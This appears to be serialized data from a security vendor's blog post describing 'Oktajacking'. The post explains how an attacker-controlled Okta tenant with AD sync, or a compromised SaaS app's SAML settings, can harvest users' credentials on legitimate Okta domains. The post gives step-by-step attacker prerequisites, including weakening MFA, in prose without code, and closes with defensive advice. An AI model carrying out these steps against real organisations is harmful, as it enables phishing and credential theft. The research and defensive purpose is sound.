tenants",{"data":227920,"marks":227921,"value":227922,"nodeType":173},{},[],", particularly with regard to clever phishing attacks aimed at gaining initial access to some cloud identities. Today, we’ll look at how Okta’s AD synchronization is pretty much SAMLjacking on steroids. We’ll also consider how it can be used as a stealthy watering-hole style lateral movement attack too.",{"data":227924,"content":227925,"nodeType":178},{},[227926],{"data":227927,"marks":227928,"value":227929,"nodeType":173},{},[],"To be clear, this isn't a vulnerability in Okta that circumvents a security boundary and needs to be patched. This is offensive use of a product feature, the SaaS version of living off the land (LOTL). Let's call it living off the cloud (LOTC).",{"data":227931,"content":227932,"nodeType":169},{},[227933],{"data":227934,"marks":227935,"value":227936,"nodeType":173},{},[],"What is SAMLjacking?",{"data":227938,"content":227939,"nodeType":178},{},[227940,227943,227950],{"data":227941,"marks":227942,"value":37,"nodeType":173},{},[],{"data":227944,"content":227945,"nodeType":186},{"uri":63250},[227946],{"data":227947,"marks":227948,"value":63256,"nodeType":173},{},[227949],{"type":194},{"data":227951,"marks":227952,"value":227953,"nodeType":173},{},[]," is where an attacker makes use of SAML SSO configuration settings for a SaaS tenant they control in order to redirect users to a malicious link during the authentication process. This can be highly effective for phishing, as the original URL will be a legitimate SaaS URL and users will provide their credentials because they’re expecting that as part of the login process. ",{"data":227955,"content":227956,"nodeType":169},{},[227957],{"data":227958,"marks":227959,"value":227960,"nodeType":173},{},[],"What is a poisoned tenant?",{"data":227962,"content":227963,"nodeType":178},{},[227964,227967,227974],{"data":227965,"marks":227966,"value":37,"nodeType":173},{},[],{"data":227968,"content":227969,"nodeType":186},{"uri":208521},[227970],{"data":227971,"marks":227972,"value":227973,"nodeType":173},{},[],"Poisoned tenants",{"data":227975,"marks":227976,"value":227977,"nodeType":173},{},[]," involve an adversary registering a tenant for a SaaS app they control and tricking target users to join it, often using built-in invite functionality. The end goal is to have some target users actively using a tenant you (as the adversary) control.",{"data":227979,"content":227980,"nodeType":169},{},[227981],{"data":227982,"marks":227983,"value":227984,"nodeType":173},{},[],"What is Oktajacking?",{"data":227986,"content":227987,"nodeType":178},{},[227988],{"data":227989,"marks":227990,"value":227991,"nodeType":173},{},[],"This is a name I’ve been using to refer to using Okta to do the credential capture/keylogging for you, without needing to have your own malicious domain hosting your malicious SAML server. This is even more effective than regular SAMLjacking as the user will only ever see legitimate SaaS domains, with the subdomain being the attacker-chosen part (e.g. https://attacker-tenant.okta.com).",{"data":227993,"content":227994,"nodeType":178},{},[227995,227999,228008,228012,228021],{"data":227996,"marks":227997,"value":227998,"nodeType":173},{},[],"However, the awesome research that underpins this technique was conducted by Adam Chester (",{"data":228000,"content":228002,"nodeType":186},{"uri":228001},"https://twitter.com/_xpn_",[228003],{"data":228004,"marks":228005,"value":228007,"nodeType":173},{},[228006],{"type":194},"@_xpn_",{"data":228009,"marks":228010,"value":228011,"nodeType":173},{},[],") and is covered in his excellent article, ",{"data":228013,"content":228015,"nodeType":186},{"uri":228014},"https://blog.xpnsec.com/okta-for-redteamers/",[228016],{"data":228017,"marks":228018,"value":228020,"nodeType":173},{},[228019],{"type":194},"Okta for Red Teamers",{"data":228022,"marks":228023,"value":228024,"nodeType":173},{},[],". If you haven’t already read that, you absolutely should. ",{"data":228026,"content":228027,"nodeType":178},{},[228028],{"data":228029,"marks":228030,"value":228031,"nodeType":173},{},[],"Adam identified that if you compromise a Windows domain that’s linked to Okta and/or compromise an Okta admin account for an Okta instance linked to a Windows domain, you can use the Okta AD agent to capture credentials during logins. There’s lots more, but that’s the key part we’ll build upon for this article. ",{"data":228033,"content":228034,"nodeType":178},{},[228035],{"data":228036,"marks":228037,"value":228038,"nodeType":173},{},[],"This attack works because Okta forwards credentials from logins for accounts tied to AD to its own AD agent that runs on the target network. Then, Okta allows the agent to report back to them about whether the login should be successful or not. This enables an attacker who has compromised an AD agent, or is able to emulate one, to both monitor login credentials for Okta users and provide skeleton key-like functionality to authenticate to Okta as any user they like. ",{"data":228040,"content":228041,"nodeType":178},{},[228042],{"data":228043,"marks":228044,"value":228045,"nodeType":173},{},[],"The context of this in Adam’s article was primarily a traditional Windows domain compromise scenario where an attacker could use this method as a form of incredibly powerful domain-level persistence or to move laterally to other accounts. This is applicable in late-stage kill chain phases, where the attacker has already achieved a total organization-level compromise. ",{"data":228047,"content":228048,"nodeType":178},{},[228049],{"data":228050,"marks":228051,"value":228052,"nodeType":173},{},[],"So, how can this technique be leveraged earlier in the kill chain? We’ll consider the following two scenarios for this article:",{"data":228054,"content":228055,"nodeType":250},{},[228056,228071],{"data":228057,"content":228058,"nodeType":254},{},[228059],{"data":228060,"content":228061,"nodeType":178},{},[228062,228067],{"data":228063,"marks":228064,"value":228066,"nodeType":173},{},[228065],{"type":370},"Oktajacking for initial access",{"data":228068,"marks":228069,"value":228070,"nodeType":173},{},[]," - directly phishing credentials via a valid Okta tenant we create",{"data":228072,"content":228073,"nodeType":254},{},[228074],{"data":228075,"content":228076,"nodeType":178},{},[228077,228082],{"data":228078,"marks":228079,"value":228081,"nodeType":173},{},[228080],{"type":370},"Oktajacking for lateral movement ",{"data":228083,"marks":228084,"value":228085,"nodeType":173},{},[],"- capturing credentials via a watering hole attack when having admin-level compromised a SaaS application in use by the target organization",{"data":228087,"content":228090,"nodeType":312},{"target":228088},{"sys":228089},{"id":169040,"type":317,"linkType":318},[],{"data":228092,"content":228093,"nodeType":169},{},[228094],{"data":228095,"marks":228096,"value":228066,"nodeType":173},{},[],{"data":228098,"content":228099,"nodeType":178},{},[228100,228104,228113],{"data":228101,"marks":228102,"value":228103,"nodeType":173},{},[],"The most common way someone might attack Okta-protected organizations would be to conduct traditional phishing attacks hosted on an attacker-controlled domain that emulate an Okta login page. A great article to check out on this would be Nick Vangilder’s article, ",{"data":228105,"content":228107,"nodeType":186},{"uri":228106},"https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23",[228108],{"data":228109,"marks":228110,"value":228112,"nodeType":173},{},[228111],{"type":194},"Okta for Red Teamers - Perimeter Edition. ",{"data":228114,"marks":228115,"value":37,"nodeType":173},{},[],{"data":228117,"content":228118,"nodeType":178},{},[228119],{"data":228120,"marks":228121,"value":228122,"nodeType":173},{},[],"However, as with most phishing attacks this involves the use of a malicious domain to host the phishing server. Okta AD synchronization allows us to use legitimate Okta domains to do the phishing for us. This attack can catch out even the most security conscious users.",{"data":228124,"content":228125,"nodeType":178},{},[228126],{"data":228127,"marks":228128,"value":228129,"nodeType":173},{},[],"To do this, we set up an attacker-controlled Okta tenant as a poisoned tenant and configure it for AD integration, using Adam Chester’s python script to harvest credentials. This enables actual Okta-owned domains to be used in phishing attacks to target users. A careful attacker would likely use a tenant name similar to the target organization’s real Okta tenant name. This is incredibly powerful and is likely to be effective against even the most security conscious users. ",{"data":228131,"content":228132,"nodeType":178},{},[228133],{"data":228134,"marks":228135,"value":228136,"nodeType":173},{},[],"A few prerequisites and tweaks are required in order to make this attack successful:",{"data":228138,"content":228139,"nodeType":250},{},[228140,228150,228160],{"data":228141,"content":228142,"nodeType":254},{},[228143],{"data":228144,"content":228145,"nodeType":178},{},[228146],{"data":228147,"marks":228148,"value":228149,"nodeType":173},{},[],"Import and activate accounts from AD that match the emails of users you want to target - this will ensure these emails are mapped to AD for authentication and cause Okta to send the credentials to the monitoring script.",{"data":228151,"content":228152,"nodeType":254},{},[228153],{"data":228154,"content":228155,"nodeType":178},{},[228156],{"data":228157,"marks":228158,"value":228159,"nodeType":173},{},[],"Make a small modification to the python script to accept any password as valid, rather than a specific skeleton key. ",{"data":228161,"content":228162,"nodeType":254},{},[228163],{"data":228164,"content":228165,"nodeType":178},{},[228166],{"data":228167,"marks":228168,"value":228169,"nodeType":173},{},[],"Modify the default authentication policy for Okta to allow single-factor password authentication for the target users - this will prevent them being prompted to use Okta Verify as part of the login process.",{"data":228171,"content":228172,"nodeType":178},{},[228173],{"data":228174,"marks":228175,"value":228176,"nodeType":173},{},[],"The goal for the last two actions above is to allow target users to authenticate legitimately and then redirect them elsewhere, while capturing their credentials. This is better achieved by having their first password accepted rather than them continually failing to authenticate, which may eventually raise alarm bells. ",{"data":228178,"content":228179,"nodeType":178},{},[228180],{"data":228181,"marks":228182,"value":228183,"nodeType":173},{},[],"In this case, we’ll use Okta’s bug bounty system as a test for our poisoned tenant, but in practice an attacker could set up a legitimate Okta tenant, pay for it and name it whatever they like. ",{"data":228185,"content":228186,"nodeType":178},{},[228187],{"data":228188,"marks":228189,"value":228190,"nodeType":173},{},[],"The end result is a legitimate Okta domain and login page that will capture credentials for the attacker, which can then be used in highly convincing phishing attacks. In this example, the following URL will capture credentials for us:",{"data":228192,"content":228193,"nodeType":178},{},[228194,228197,228205],{"data":228195,"marks":228196,"value":37,"nodeType":173},{},[],{"data":228198,"content":228200,"nodeType":186},{"uri":228199},"https://bugcrowd-oie-lukejennings-1.oktapreview.com/",[228201],{"data":228202,"marks":228203,"value":228199,"nodeType":173},{},[228204],{"type":194},{"data":228206,"marks":228207,"value":37,"nodeType":173},{},[],{"data":228209,"content":228213,"nodeType":312},{"target":228210},{"sys":228211},{"id":228212,"type":317,"linkType":318},"2KBgFSFnmIdKqfpp8sPGb1",[],{"data":228215,"content":228219,"nodeType":312},{"target":228216},{"sys":228217},{"id":228218,"type":317,"linkType":318},"5ef3me94SCAdM5vYXodqbF",[],{"data":228221,"content":228225,"nodeType":312},{"target":228222},{"sys":228223},{"id":228224,"type":317,"linkType":318},"3OFjwQRQTJynaPme8WY9cp",[],{"data":228227,"content":228228,"nodeType":169},{},[228229],{"data":228230,"marks":228231,"value":228232,"nodeType":173},{},[],"Oktajacking for lateral movement",{"data":228234,"content":228235,"nodeType":178},{},[228236,228240,228250],{"data":228237,"marks":228238,"value":228239,"nodeType":173},{},[],"In both the previous section and our article on ",{"data":228241,"content":228245,"nodeType":1698},{"target":228242},{"sys":228243},{"id":228244,"type":317,"linkType":318},"3F96pyn4qqkbVctSOH69vm",[228246],{"data":228247,"marks":228248,"value":63256,"nodeType":173},{},[228249],{"type":194},{"data":228251,"marks":228252,"value":228253,"nodeType":173},{},[],", we focused on conducting highly convincing phishing attacks by sending URLs for legitimate SaaS domains that capture credentials. ",{"data":228255,"content":228256,"nodeType":178},{},[228257],{"data":228258,"marks":228259,"value":228260,"nodeType":173},{},[],"But what if we achieve an admin-level compromise of a SaaS app used by a target organization that authenticates via Okta already? How can we leverage that access to perform lateral movement?",{"data":228262,"content":228263,"nodeType":178},{},[228264],{"data":228265,"marks":228266,"value":228267,"nodeType":173},{},[],"We can change the SAML configuration in the compromised SaaS application to point to a different Okta instance that we control and then conduct the same credential capture attack we saw in the previous section. ",{"data":228269,"content":228270,"nodeType":178},{},[228271],{"data":228272,"marks":228273,"value":228274,"nodeType":173},{},[],"In other words, we can then authenticate to the target SaaS application as any user we like and also capture Okta credentials for all legitimate users also using that application without needing to send any phishing links. ",{"data":228276,"content":228277,"nodeType":178},{},[228278],{"data":228279,"marks":228280,"value":228281,"nodeType":173},{},[],"We’re going to use Datadog as a demo example for this - just because we need something real to target. To be crystal clear, this will work for basically any app that supports SAML. This is not a bug in SAML, or in Okta, or Datadog - it's the consequence of having privileged administrative access to an app, and the ability to change SSO configuration.\n\nTo set up the attack, we need to first:",{"data":228283,"content":228284,"nodeType":250},{},[228285,228295,228305,228315,228325,228335],{"data":228286,"content":228287,"nodeType":254},{},[228288],{"data":228289,"content":228290,"nodeType":178},{},[228291],{"data":228292,"marks":228293,"value":228294,"nodeType":173},{},[],"Compromise the organization’s Datadog tenant at admin-level",{"data":228296,"content":228297,"nodeType":254},{},[228298],{"data":228299,"content":228300,"nodeType":178},{},[228301],{"data":228302,"marks":228303,"value":228304,"nodeType":173},{},[],"Create a malicious Okta tenant and connect it to an active directory instance with the same email domain as the target organization",{"data":228306,"content":228307,"nodeType":254},{},[228308],{"data":228309,"content":228310,"nodeType":178},{},[228311],{"data":228312,"marks":228313,"value":228314,"nodeType":173},{},[],"Create AD accounts for all users that will be targeted so they can be imported into Okta as AD account - in practice, it would be best to copy the list of users from Datadog and replicate this in AD and Okta",{"data":228316,"content":228317,"nodeType":254},{},[228318],{"data":228319,"content":228320,"nodeType":178},{},[228321],{"data":228322,"marks":228323,"value":228324,"nodeType":173},{},[],"Run Adam Chester’s python script to harvest credentials for Okta AD authentication and modify it to accept any password ",{"data":228326,"content":228327,"nodeType":254},{},[228328],{"data":228329,"content":228330,"nodeType":178},{},[228331],{"data":228332,"marks":228333,"value":228334,"nodeType":173},{},[],"Modify the Datadog SAML configuration to point to the malicious Okta tenant, instead of the original legitimate Okta tenant",{"data":228336,"content":228337,"nodeType":254},{},[228338],{"data":228339,"content":228340,"nodeType":178},{},[228341],{"data":228342,"marks":228343,"value":228344,"nodeType":173},{},[],"Sit back, relax, and watch the credentials coming in",{"data":228346,"content":228347,"nodeType":178},{},[228348],{"data":228349,"marks":228350,"value":228351,"nodeType":173},{},[],"Now we’ll explain what happens from the perspective of other users of the target organization’s Datadog tenant that has been compromised:",{"data":228353,"content":228354,"nodeType":250},{},[228355,228365,228375,228385],{"data":228356,"content":228357,"nodeType":254},{},[228358],{"data":228359,"content":228360,"nodeType":178},{},[228361],{"data":228362,"marks":228363,"value":228364,"nodeType":173},{},[],"Their Datadog session expires and they’re redirected back to the SAML login provider for re-authentication - in this case, to our malicious Okta tenant we have substituted for the real Okta tenant",{"data":228366,"content":228367,"nodeType":254},{},[228368],{"data":228369,"content":228370,"nodeType":178},{},[228371],{"data":228372,"marks":228373,"value":228374,"nodeType":173},{},[],"The user enters their credentials into the login page for our malicious Okta tenant. Our instance of Adam Chester’s AD synchronization script harvests the user’s login credentials.",{"data":228376,"content":228377,"nodeType":254},{},[228378],{"data":228379,"content":228380,"nodeType":178},{},[228381],{"data":228382,"marks":228383,"value":228384,"nodeType":173},{},[],"The user is already accustomed to using Okta to access Datadog, the Okta login page they are directed to is on a legitimate Okta domain and they haven’t clicked any links in emails/IM messages so there is no reason for suspicion.",{"data":228386,"content":228387,"nodeType":254},{},[228388],{"data":228389,"content":228390,"nodeType":178},{},[228391],{"data":228392,"marks":228393,"value":228394,"nodeType":173},{},[],"The modification we made to accept any credentials means the script returns true to Okta and causes Okta to accept the authentication attempt. This causes the user to be logged into the legitimate Datadog tenant again, where they can carry on their work, unaware they have just had their Okta credentials stolen.",{"data":228396,"content":228397,"nodeType":178},{},[228398],{"data":228399,"marks":228400,"value":228401,"nodeType":173},{},[],"The following video shows what a login attempt to Datadog looks like after the SAML configuration has been modified to point to our malicious Okta tenant. You can see how all the URLs observed are legitimate Datadog and Okta domains, any password will be accepted and harvested and the target user will be logged into the legitimate Datadog tenant successfully at the end.",{"data":228403,"content":228407,"nodeType":312},{"target":228404},{"sys":228405},{"id":228406,"type":317,"linkType":318},"dHVOdvHLdVzOEGai6qtSl",[],{"data":228409,"content":228410,"nodeType":178},{},[228411],{"data":228412,"marks":228413,"value":228414,"nodeType":173},{},[],"This type of attack sits somewhere in the middle of the kill chain between the initial access phishing we covered in the previous section and the full active directory/Okta domain compromise Adam Chester covered in his article. In this instance, we are looking at leveraging a more limited admin-level compromise of a single SaaS application to extend our access much further. ",{"data":228416,"content":228417,"nodeType":178},{},[228418,228422,228426],{"data":228419,"marks":228420,"value":228421,"nodeType":173},{},[],"When an organization relies on SaaS apps, it’s likely there may be some apps that are not considered particularly security critical and also may have “admins” that are actually just members of non-technical teams in the business. An admin-level compromise of ",{"data":228423,"marks":228424,"value":67363,"nodeType":173},{},[228425],{"type":1646},{"data":228427,"marks":228428,"value":228429,"nodeType":173},{},[]," SaaS application used by the organization can be used to conduct highly stealthy Okta credential capturing for all users. With those credentials, an attacker can expand their access and move laterally to other accounts and applications. ",{"data":228431,"content":228434,"nodeType":312},{"target":228432},{"sys":228433},{"id":209109,"type":317,"linkType":318},[],{"data":228436,"content":228437,"nodeType":169},{},[228438],{"data":228439,"marks":228440,"value":15539,"nodeType":173},{},[],{"data":228442,"content":228443,"nodeType":178},{},[228444],{"data":228445,"marks":228446,"value":228447,"nodeType":173},{},[],"Let’s take a step back and consider the key points of impact here:",{"data":228449,"content":228450,"nodeType":250},{},[228451,228461,228471],{"data":228452,"content":228453,"nodeType":254},{},[228454],{"data":228455,"content":228456,"nodeType":178},{},[228457],{"data":228458,"marks":228459,"value":228460,"nodeType":173},{},[],"Attackers can send phishing links pointing to legitimate Okta domains and use those to capture credentials due to the way Okta AD synchronization works - this bypasses common user security training around checking domains are legitimate",{"data":228462,"content":228463,"nodeType":254},{},[228464],{"data":228465,"content":228466,"nodeType":178},{},[228467],{"data":228468,"marks":228469,"value":228470,"nodeType":173},{},[],"If an attacker compromises a legitimate SaaS tenant in use by an organization protected by Okta, they can modify the SAML configuration to point to their own malicious Okta tenant and thus capture credentials using the same method",{"data":228472,"content":228473,"nodeType":254},{},[228474],{"data":228475,"content":228476,"nodeType":178},{},[228477],{"data":228478,"marks":228479,"value":228480,"nodeType":173},{},[],"It would be extremely unlikely legitimate users would notice as it is part of the normal authentication flow, all domains observed would be legitimate SaaS and Okta domains, and they would be logged in successfully to the real SaaS tenant after entering their password",{"data":228482,"content":228483,"nodeType":169},{},[228484],{"data":228485,"marks":228486,"value":40632,"nodeType":173},{},[],{"data":228488,"content":228489,"nodeType":178},{},[228490],{"data":228491,"marks":228492,"value":228493,"nodeType":173},{},[],"Okta is an identity management service that can help manage and protect access to a large number of applications used by an organization. However, due to the manner in which Okta AD synchronization works, it’s possible to use phishing links pointing to legitimate Okta domains to capture users credentials.",{"data":228495,"content":228496,"nodeType":178},{},[228497],{"data":228498,"marks":228499,"value":228500,"nodeType":173},{},[],"Additionally, admin access to any application in use with Okta needs to be carefully considered even if the application itself is not particularly sensitive. This is because a compromise of that application, or of a user account with admin access to it, can be used to modify the existing Okta SAML configuration to point to a malicious Okta tenant and conduct an extremely stealthy credential harvesting attack of all users of the application. ",{"data":228502,"content":228503,"nodeType":178},{},[228504],{"data":228505,"marks":228506,"value":228507,"nodeType":173},{},[],"Defenders should carefully monitor user access to Okta URLs that do not match their own legitimate tenant as it could be a sign of credential capturing attacks.","In this article, we'll show you how to use Okta to do keylogging for you, without needing to have your own malicious domain hosting your malicious SAML server. ","2023-12-06T00:00:00.000Z","oktajacking",{"items":228512},[228513,228515],{"sys":228514,"name":505},{"id":504},{"sys":228516,"name":26137},{"id":26136},{"items":228518},[228519],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":228520},{"url":8615},{"items":228522},[228523],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":228524},{"url":1496},{"json":228526,"links":229243},{"nodeType":165,"data":228527,"content":228528},{},[228529,228535,228541,228547,228573,228579,228585,228600,228606,228612,228627,228633,228639,228645,228650,228656,228695,228701,228707,228713,228734,228740,228746,228752,228794,228800,228806,228812,228818,228828,228834,228841,228847,228876,228882,228888,228894,228900,228960,228967,228973,228979,229009,229015,229022,229028,229034,229044,229057,229083,229099,229105,229120,229126,229132,229147,229153,229159,229165,229195,229201,229217,229232,229237],{"nodeType":178,"data":228530,"content":228531},{},[228532],{"nodeType":173,"value":184644,"marks":228533,"data":228534},[],{},{"nodeType":178,"data":228536,"content":228537},{},[228538],{"nodeType":173,"value":184651,"marks":228539,"data":228540},[],{},{"nodeType":178,"data":228542,"content":228543},{},[228544],{"nodeType":173,"value":184658,"marks":228545,"data":228546},[],{},{"nodeType":178,"data":228548,"content":228549},{},[228550,228553,228560,228563,228570],{"nodeType":173,"value":37,"marks":228551,"data":228552},[],{},{"nodeType":186,"data":228554,"content":228555},{"uri":832},[228556],{"nodeType":173,"value":26529,"marks":228557,"data":228559},[228558],{"type":194},{},{"nodeType":173,"value":184675,"marks":228561,"data":228562},[],{},{"nodeType":186,"data":228564,"content":228565},{"uri":184680},[228566],{"nodeType":173,"value":182807,"marks":228567,"data":228569},[228568],{"type":194},{},{"nodeType":173,"value":184687,"marks":228571,"data":228572},[],{},{"nodeType":169,"data":228574,"content":228575},{},[228576],{"nodeType":173,"value":184694,"marks":228577,"data":228578},[],{},{"nodeType":178,"data":228580,"content":228581},{},[228582],{"nodeType":173,"value":184701,"marks":228583,"data":228584},[],{},{"nodeType":178,"data":228586,"content":228587},{},[228588,228591,228597],{"nodeType":173,"value":184708,"marks":228589,"data":228590},[],{},{"nodeType":186,"data":228592,"content":228593},{"uri":4492},[228594],{"nodeType":173,"value":184715,"marks":228595,"data":228596},[],{},{"nodeType":173,"value":2340,"marks":228598,"data":228599},[],{},{"nodeType":235,"data":228601,"content":228602},{},[228603],{"nodeType":173,"value":184725,"marks":228604,"data":228605},[],{},{"nodeType":178,"data":228607,"content":228608},{},[228609],{"nodeType":173,"value":184732,"marks":228610,"data":228611},[],{},{"nodeType":178,"data":228613,"content":228614},{},[228615,228618,228624],{"nodeType":173,"value":184739,"marks":228616,"data":228617},[],{},{"nodeType":186,"data":228619,"content":228620},{"uri":4492},[228621],{"nodeType":173,"value":184746,"marks":228622,"data":228623},[],{},{"nodeType":173,"value":184750,"marks":228625,"data":228626},[],{},{"nodeType":178,"data":228628,"content":228629},{},[228630],{"nodeType":173,"value":184757,"marks":228631,"data":228632},[],{},{"nodeType":235,"data":228634,"content":228635},{},[228636],{"nodeType":173,"value":184764,"marks":228637,"data":228638},[],{},{"nodeType":178,"data":228640,"content":228641},{},[228642],{"nodeType":173,"value":184771,"marks":228643,"data":228644},[],{},{"nodeType":312,"data":228646,"content":228649},{"target":228647},{"sys":228648},{"id":184778,"type":317,"linkType":318},[],{"nodeType":178,"data":228651,"content":228652},{},[228653],{"nodeType":173,"value":184784,"marks":228654,"data":228655},[],{},{"nodeType":250,"data":228657,"content":228658},{},[228659,228668,228677,228686],{"nodeType":254,"data":228660,"content":228661},{},[228662],{"nodeType":178,"data":228663,"content":228664},{},[228665],{"nodeType":173,"value":184797,"marks":228666,"data":228667},[],{},{"nodeType":254,"data":228669,"content":228670},{},[228671],{"nodeType":178,"data":228672,"content":228673},{},[228674],{"nodeType":173,"value":184807,"marks":228675,"data":228676},[],{},{"nodeType":254,"data":228678,"content":228679},{},[228680],{"nodeType":178,"data":228681,"content":228682},{},[228683],{"nodeType":173,"value":184817,"marks":228684,"data":228685},[],{},{"nodeType":254,"data":228687,"content":228688},{},[228689],{"nodeType":178,"data":228690,"content":228691},{},[228692],{"nodeType":173,"value":184827,"marks":228693,"data":228694},[],{},{"nodeType":178,"data":228696,"content":228697},{},[228698],{"nodeType":173,"value":184834,"marks":228699,"data":228700},[],{},{"nodeType":235,"data":228702,"content":228703},{},[228704],{"nodeType":173,"value":184841,"marks":228705,"data":228706},[],{},{"nodeType":178,"data":228708,"content":228709},{},[228710],{"nodeType":173,"value":184848,"marks":228711,"data":228712},[],{},{"nodeType":250,"data":228714,"content":228715},{},[228716,228725],{"nodeType":254,"data":228717,"content":228718},{},[228719],{"nodeType":178,"data":228720,"content":228721},{},[228722],{"nodeType":173,"value":184861,"marks":228723,"data":228724},[],{},{"nodeType":254,"data":228726,"content":228727},{},[228728],{"nodeType":178,"data":228729,"content":228730},{},[228731],{"nodeType":173,"value":184871,"marks":228732,"data":228733},[],{},{"nodeType":178,"data":228735,"content":228736},{},[228737],{"nodeType":173,"value":184878,"marks":228738,"data":228739},[],{},{"nodeType":235,"data":228741,"content":228742},{},[228743],{"nodeType":173,"value":184885,"marks":228744,"data":228745},[],{},{"nodeType":178,"data":228747,"content":228748},{},[228749],{"nodeType":173,"value":184892,"marks":228750,"data":228751},[],{},{"nodeType":250,"data":228753,"content":228754},{},[228755,228768,228781],{"nodeType":254,"data":228756,"content":228757},{},[228758],{"nodeType":178,"data":228759,"content":228760},{},[228761,228765],{"nodeType":173,"value":184905,"marks":228762,"data":228764},[228763],{"type":370},{},{"nodeType":173,"value":184910,"marks":228766,"data":228767},[],{},{"nodeType":254,"data":228769,"content":228770},{},[228771],{"nodeType":178,"data":228772,"content":228773},{},[228774,228778],{"nodeType":173,"value":184920,"marks":228775,"data":228777},[228776],{"type":370},{},{"nodeType":173,"value":184925,"marks":228779,"data":228780},[],{},{"nodeType":254,"data":228782,"content":228783},{},[228784],{"nodeType":178,"data":228785,"content":228786},{},[228787,228791],{"nodeType":173,"value":184935,"marks":228788,"data":228790},[228789],{"type":370},{},{"nodeType":173,"value":184940,"marks":228792,"data":228793},[],{},{"nodeType":178,"data":228795,"content":228796},{},[228797],{"nodeType":173,"value":184947,"marks":228798,"data":228799},[],{},{"nodeType":178,"data":228801,"content":228802},{},[228803],{"nodeType":173,"value":184954,"marks":228804,"data":228805},[],{},{"nodeType":178,"data":228807,"content":228808},{},[228809],{"nodeType":173,"value":184961,"marks":228810,"data":228811},[],{},{"nodeType":169,"data":228813,"content":228814},{},[228815],{"nodeType":173,"value":184968,"marks":228816,"data":228817},[],{},{"nodeType":178,"data":228819,"content":228820},{},[228821,228825],{"nodeType":173,"value":184975,"marks":228822,"data":228824},[228823],{"type":370},{},{"nodeType":173,"value":184980,"marks":228826,"data":228827},[],{},{"nodeType":178,"data":228829,"content":228830},{},[228831],{"nodeType":173,"value":184987,"marks":228832,"data":228833},[],{},{"nodeType":178,"data":228835,"content":228836},{},[228837],{"nodeType":173,"value":184994,"marks":228838,"data":228840},[228839],{"type":370},{},{"nodeType":178,"data":228842,"content":228843},{},[228844],{"nodeType":173,"value":185002,"marks":228845,"data":228846},[],{},{"nodeType":250,"data":228848,"content":228849},{},[228850,228863],{"nodeType":254,"data":228851,"content":228852},{},[228853],{"nodeType":178,"data":228854,"content":228855},{},[228856,228860],{"nodeType":173,"value":185015,"marks":228857,"data":228859},[228858],{"type":370},{},{"nodeType":173,"value":185020,"marks":228861,"data":228862},[],{},{"nodeType":254,"data":228864,"content":228865},{},[228866],{"nodeType":178,"data":228867,"content":228868},{},[228869,228873],{"nodeType":173,"value":185030,"marks":228870,"data":228872},[228871],{"type":370},{},{"nodeType":173,"value":185035,"marks":228874,"data":228875},[],{},{"nodeType":178,"data":228877,"content":228878},{},[228879],{"nodeType":173,"value":185042,"marks":228880,"data":228881},[],{},{"nodeType":235,"data":228883,"content":228884},{},[228885],{"nodeType":173,"value":185049,"marks":228886,"data":228887},[],{},{"nodeType":178,"data":228889,"content":228890},{},[228891],{"nodeType":173,"value":185056,"marks":228892,"data":228893},[],{},{"nodeType":178,"data":228895,"content":228896},{},[228897],{"nodeType":173,"value":185063,"marks":228898,"data":228899},[],{},{"nodeType":250,"data":228901,"content":228902},{},[228903,228922,228941],{"nodeType":254,"data":228904,"content":228905},{},[228906],{"nodeType":178,"data":228907,"content":228908},{},[228909,228912,228919],{"nodeType":173,"value":185076,"marks":228910,"data":228911},[],{},{"nodeType":186,"data":228913,"content":228914},{"uri":125812},[228915],{"nodeType":173,"value":1255,"marks":228916,"data":228918},[228917],{"type":194},{},{"nodeType":173,"value":53584,"marks":228920,"data":228921},[],{},{"nodeType":254,"data":228923,"content":228924},{},[228925],{"nodeType":178,"data":228926,"content":228927},{},[228928,228931,228938],{"nodeType":173,"value":174447,"marks":228929,"data":228930},[],{},{"nodeType":186,"data":228932,"content":228933},{"uri":125982},[228934],{"nodeType":173,"value":1300,"marks":228935,"data":228937},[228936],{"type":194},{},{"nodeType":173,"value":53584,"marks":228939,"data":228940},[],{},{"nodeType":254,"data":228942,"content":228943},{},[228944],{"nodeType":178,"data":228945,"content":228946},{},[228947,228950,228957],{"nodeType":173,"value":174385,"marks":228948,"data":228949},[],{},{"nodeType":186,"data":228951,"content":228952},{"uri":174390},[228953],{"nodeType":173,"value":174393,"marks":228954,"data":228956},[228955],{"type":194},{},{"nodeType":173,"value":53584,"marks":228958,"data":228959},[],{},{"nodeType":178,"data":228961,"content":228962},{},[228963],{"nodeType":173,"value":185131,"marks":228964,"data":228966},[228965],{"type":370},{},{"nodeType":178,"data":228968,"content":228969},{},[228970],{"nodeType":173,"value":185139,"marks":228971,"data":228972},[],{},{"nodeType":178,"data":228974,"content":228975},{},[228976],{"nodeType":173,"value":185146,"marks":228977,"data":228978},[],{},{"nodeType":250,"data":228980,"content":228981},{},[228982,229000],{"nodeType":254,"data":228983,"content":228984},{},[228985],{"nodeType":178,"data":228986,"content":228987},{},[228988,228991,228997],{"nodeType":173,"value":185159,"marks":228989,"data":228990},[],{},{"nodeType":186,"data":228992,"content":228993},{"uri":4492},[228994],{"nodeType":173,"value":185166,"marks":228995,"data":228996},[],{},{"nodeType":173,"value":185170,"marks":228998,"data":228999},[],{},{"nodeType":254,"data":229001,"content":229002},{},[229003],{"nodeType":178,"data":229004,"content":229005},{},[229006],{"nodeType":173,"value":185180,"marks":229007,"data":229008},[],{},{"nodeType":178,"data":229010,"content":229011},{},[229012],{"nodeType":173,"value":185187,"marks":229013,"data":229014},[],{},{"nodeType":178,"data":229016,"content":229017},{},[229018],{"nodeType":173,"value":185194,"marks":229019,"data":229021},[229020],{"type":370},{},{"nodeType":235,"data":229023,"content":229024},{},[229025],{"nodeType":173,"value":185202,"marks":229026,"data":229027},[],{},{"nodeType":178,"data":229029,"content":229030},{},[229031],{"nodeType":173,"value":185209,"marks":229032,"data":229033},[],{},{"nodeType":178,"data":229035,"content":229036},{},[229037,229040],{"nodeType":173,"value":185216,"marks":229038,"data":229039},[],{},{"nodeType":173,"value":185220,"marks":229041,"data":229043},[229042],{"type":370},{},{"nodeType":178,"data":229045,"content":229046},{},[229047,229050,229054],{"nodeType":173,"value":185228,"marks":229048,"data":229049},[],{},{"nodeType":173,"value":185232,"marks":229051,"data":229053},[229052],{"type":370},{},{"nodeType":173,"value":185237,"marks":229055,"data":229056},[],{},{"nodeType":178,"data":229058,"content":229059},{},[229060,229063,229070,229073,229080],{"nodeType":173,"value":185244,"marks":229061,"data":229062},[],{},{"nodeType":186,"data":229064,"content":229065},{"uri":63250},[229066],{